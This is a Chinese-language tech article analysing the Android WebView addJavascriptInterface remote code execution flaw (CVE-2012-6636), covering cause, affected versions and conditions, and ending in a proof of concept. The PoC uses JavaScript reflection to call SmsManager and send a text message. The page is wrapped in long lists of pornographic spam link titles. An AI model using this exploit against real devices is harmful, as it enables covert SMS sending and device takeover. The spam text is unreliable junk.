亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > OS > 安卓 > 正文

關于Android中WebView遠程代碼執行漏洞淺析

2024-09-11 17:15:13
字體:
來源:轉載
供稿:網友

1. WebView 遠程代碼執行漏洞描述

      Android API level 16以及之前的版本存在遠程代碼執行安全漏洞,該漏洞源于程序沒有正確限制使用WebView.addJavascriptInterface方法,遠程攻擊者可通過使用Java Reflection API利用該漏洞執行任意Java對象的方法,簡單的說就是通過addJavascriptInterface給WebView加入一個JavaScript橋接接口,JavaScript通過調用這個接口可以直接操作本地的JAVA接口。該漏洞最早公布于CVE-2012-6636【1】,其描述了WebView中addJavascriptInterface API導致的遠程代碼執行安全漏洞。

      該漏洞公布的近期,多款Android流行應用曾被曝出高危掛馬漏洞:點擊消息或朋友社區圈中的一條網址時,用戶手機然后就會自動執行被掛馬的代碼指令,從而導致被安裝惡意扣費軟件、向好友發送欺詐短信、通訊錄和短信被竊取以及被遠程控制等嚴重后果。在烏云漏洞平臺上,包括Android版的微信、QQ、騰訊微博、QQ瀏覽器、快播、百度瀏覽器、金山瀏覽器等大批TOP應用均被曝光同類型的漏洞。

      論文Attacks on WebView in the Android System【2】中指出可以利用所導出的讀寫文件接口來進行文件的讀寫操作,攻擊者可以通過中間人攻擊篡改Webview所顯示的頁面來達到對手機文件系統的控制。

2. WebView 遠程代碼執行影響范圍

      Android API level 小于17 (即Android 4.2之前的系統版本)

3.WebView 遠程代碼執行漏洞詳情

1) WebView 遠程代碼執行漏洞位置:

      WebView.addJavascriptInterface(Object obj, String interfaceName)

2)WebView 遠程代碼執行漏洞觸發前提條件:

      使用addJavascriptInterface方法注冊可供JavaScript調用的Java對象;

      使用WebView加載外部網頁或者本地網頁;

      Android系統版本低于4.2;

3) WebView 遠程代碼執行漏洞原理:

      Android系統通過WebView.addJavascriptInterface方法注冊可供JavaScript調用的Java對象,以用于增強JavaScript的功能。但是系統并沒有對注冊Java類的方法調用的限制。導致攻擊者可以利用反射機制調用未注冊的其它任何Java類,最終導致JavaScript能力的無限增強。攻擊者利用該漏洞可以根據客戶端能力為所欲為。

4. WebView 遠程代碼執行漏洞POC

      1) 利用addJavascriptInterface方法注冊可供JavaScript調用的java對象 “injectedObj”,利用反射機制調用Android API sendTextMessage來發送短信。

      java代碼:

mWebView = new WebView(this);mWebView.getSettings().setJavaScriptEnabled(true);mWebView.addJavascriptInterface(this, "injectedObj");mWebView.loadUrl(file:///android_asset/www/index.html);

      EXP的JavaScript代碼:

<html> <body> <script>  var objSmsManager = injectedObj.getClass().forName("android.telephony.SmsManager").getM ethod("getDefault",null).invoke(null,null);  objSmsManager.sendTextMessage("10086",null,"this message is sent by JS when webview is loading",null,null); </script> </body></html>
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
在线看欧美日韩| 中文字幕国产日韩| 亚洲国产精品久久精品怡红院| 国产亚洲精品高潮| 日韩精品在线电影| 欧美性xxxxxxx| 国产aⅴ夜夜欢一区二区三区| 国产一区二区三区在线视频| 国产精品黄色影片导航在线观看| 亚洲xxx自由成熟| 国产精品成人国产乱一区| 成人激情视频小说免费下载| 亚洲视频在线观看网站| 这里精品视频免费| 激情懂色av一区av二区av| 另类天堂视频在线观看| 日本亚洲欧洲色| 日韩一区二区三区国产| 亚洲国产高清高潮精品美女| 国产成人亚洲综合| 欧美日韩国产一区二区三区| 久久久99久久精品女同性| 久久成人免费视频| 国外成人性视频| 亚洲一区二区三区视频播放| 日韩精品高清视频| 91成人免费观看网站| 久久99亚洲精品| 国产精品视频999| 国产精品99久久久久久www| 欧美成年人网站| 国产在线观看91精品一区| 欧美福利视频在线| 一区二区av在线| 亚洲高清免费观看高清完整版| 国产精品丝袜一区二区三区| 亚洲免费视频一区二区| 国产精品一区专区欧美日韩| 国产精品高清在线| 精品亚洲一区二区三区| 欧美一区二粉嫩精品国产一线天| 日产精品久久久一区二区福利| 在线播放日韩欧美| 日韩免费观看在线观看| 亚洲欧美在线一区| 综合av色偷偷网| 中文亚洲视频在线| 久久中文字幕视频| 国产精品尤物福利片在线观看| 久久男人的天堂| 自拍偷拍亚洲一区| 欧美一级片久久久久久久| 欧美日韩国产成人在线观看| 国产成人av在线播放| 91精品久久久久久久| 欧美日韩视频免费播放| 中文字幕精品av| 日韩美女av在线免费观看| 国内精品久久久久久影视8| 韩剧1988在线观看免费完整版| www.xxxx精品| 国产中文欧美精品| 欧美成aaa人片免费看| 亚洲精品美女久久久久| 亚洲老板91色精品久久| 亚洲人成电影在线观看天堂色| 欧美中文字幕精品| 亚洲国产精品人久久电影| www.久久撸.com| 国产视频亚洲视频| 亚洲欧美激情另类校园| 91精品国产777在线观看| 亚洲第一色中文字幕| 国产精品免费一区豆花| 欧美精品xxx| 最新69国产成人精品视频免费| 欧美日本高清视频| 国产中文字幕亚洲| 久久久久久亚洲精品中文字幕| 亚洲成人av片在线观看| 欧美激情久久久久久| 美女视频黄免费的亚洲男人天堂| 国产精品三级美女白浆呻吟| 91精品国产91久久久久久不卡| 国产精品中文字幕在线观看| 高跟丝袜欧美一区| 亚洲一区二区三区四区视频| 亚洲欧美制服中文字幕| 4444欧美成人kkkk| 美女视频黄免费的亚洲男人天堂| 午夜精品蜜臀一区二区三区免费| 亚洲欧美资源在线| 情事1991在线| 亚洲欧美在线看| 欧美日韩国产专区| 国产精品美女网站| 久久人人爽人人爽人人片亚洲| 亚洲天堂2020| 福利视频第一区| 亚洲欧洲日产国码av系列天堂| 国产亚洲精品高潮| 欧美另类老肥妇| 欧美日韩综合视频| 亚洲天堂色网站| 亚洲第一精品电影| 欧美激情精品久久久久久大尺度| 日韩中文在线中文网在线观看| 国产成人精品999| 欧美高清不卡在线| 亚洲aa在线观看| 在线精品视频视频中文字幕| 亚洲美女av电影| 青青青国产精品一区二区| 91精品久久久久久久久久久| 日韩中文字幕精品| 国产成人精品免高潮在线观看| 久久国产精品久久国产精品| 情事1991在线| 97激碰免费视频| 亚洲精选一区二区| 日本高清不卡的在线| 色樱桃影院亚洲精品影院| 亚洲精品久久久久久久久久久久久| 成人免费淫片aa视频免费| 欧美精品免费在线| 欧美丝袜第一区| 最新69国产成人精品视频免费| 欧美日韩精品在线播放| 色综合久久久888| 亚洲成人av在线播放| 国产精欧美一区二区三区| 亚洲美女精品久久| 欧美成年人视频网站| 国产精品久久久久久久久久久久久久| 国产日韩欧美在线看| 精品呦交小u女在线| 伊人亚洲福利一区二区三区| 青青久久av北条麻妃海外网| 深夜福利91大全| 日韩高清有码在线| 久久久天堂国产精品女人| 日韩美女在线观看| 国产91精品久久久| 国产精品美女在线| 国产精品6699| 亚洲人成在线观看| 国产精品91一区| 8x海外华人永久免费日韩内陆视频| 国产精品视频999| 欧美日韩亚洲成人| 国产精品久久久91| 都市激情亚洲色图| 国产亚洲精品激情久久| 中文字幕日韩精品在线观看| 久久久亚洲欧洲日产国码aⅴ| 日韩欧美精品网址| 欧美小视频在线| 国产精品99久久久久久www| 国产亚洲欧洲黄色| 97涩涩爰在线观看亚洲| 国产视频精品自拍| 亚洲free性xxxx护士白浆| 亚洲国产精品热久久| 精品国产一区二区三区四区在线观看|